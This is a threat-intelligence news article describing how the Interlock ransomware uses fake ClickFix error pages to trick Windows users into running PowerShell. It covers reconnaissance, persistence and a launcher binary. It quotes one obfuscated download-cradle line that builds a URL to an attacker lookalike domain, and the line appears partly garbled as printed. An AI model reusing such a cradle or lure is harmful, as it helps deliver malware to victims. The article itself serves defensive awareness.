Interlock Ransomware Employs ClickFix Technique to Run Malicious Commands on Windows Machines

The cybersecurity landscape continues to evolve as threat actors develop increasingly sophisticated methods to compromise Windows systems.

A new ransomware variant known as Interlock has emerged as a significant threat, leveraging the deceptive ClickFix social engineering technique to execute malicious commands on victim machines.

This malware represents a concerning evolution in ransomware deployment tactics, combining traditional phishing approaches with advanced multi-stage payload delivery mechanisms.

Interlock ransomware has been actively targeting organizations across North America and Europe since September 2024, demonstrating a clear financial motivation through its double extortion methodology.

The threat group behind this malware has shown remarkable persistence and technical sophistication, employing a complex attack chain that begins with compromised websites and culminates in full system compromise.

The malware’s ability to fingerprint victim systems and prioritize high-value targets indicates a well-resourced operation with strategic objectives.

In July 2025, eSentire analysts identified multiple sophisticated incidents attributed to the Interlock Group, revealing the ransomware’s evolving capabilities and attack methodologies.

The security researchers discovered that the threat actors had developed a multi-layered approach involving PowerShell scripts, PHP backdoors, and custom-built remote access tools.

This comprehensive analysis has provided crucial insights into the malware’s operational tactics, techniques, and procedures, offering the cybersecurity community valuable intelligence for defensive measures.

The attack begins when victims unknowingly visit compromised websites, particularly those infected through the KongTuke compromise chain, which subsequently redirect users to malicious ClickFix pages.

ClickFix represents a social engineering technique that deceives victims into executing harmful commands by presenting fake error messages or system notifications that appear legitimate.

Upon interaction with these deceptive elements, victims are prompted to copy and execute PowerShell commands that appear to resolve fictitious technical issues.

Advanced Multi-Stage Infection Mechanism

The technical sophistication of Interlock’s infection process demonstrates the threat actors’ deep understanding of Windows system architecture and user behavior patterns.

The initial ClickFix payload employs an obfuscated PowerShell command that establishes the foundation for subsequent malicious activities.

The deobfuscated command reveals a carefully crafted download cradle designed to retrieve additional payloads from command and control infrastructure.

The malicious PowerShell command follows this pattern: $gt="dng-m,i,crosoftds,com".Split(',');$yn='htt'+'ps://'+$gt+$gt[1]+$gt+'.'+$gt+'/' + 'uvA'+'4I'+'BD'+'9'+'.txt'.

This obfuscation technique splits domain components and reassembles them dynamically, effectively evading basic string-based detection mechanisms while maintaining functionality.

Once executed, the PowerShell script performs system reconnaissance through the systeminfo command, collecting comprehensive hardware and software information that is transmitted to the threat actors’ command and control servers.

This fingerprinting process enables the malware to determine whether the target system represents a valuable victim or a security researcher’s honeypot.

Based on this analysis, the malware either proceeds with the infection chain or terminates to avoid detection.

The malware establishes persistence through a sophisticated mechanism involving Windows shortcuts placed in the victim’s startup folder.

The Simple Process Launcher component, identified as c2.exe, uses the Windows API function CreateProcessW to spawn additional PowerShell processes while displaying fake error messages to maintain the illusion of system problems.

This deceptive approach, combined with the use of legitimate Windows binaries like rundll32.exe, demonstrates the threat actors’ commitment to blending malicious activities with normal system operations.

Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches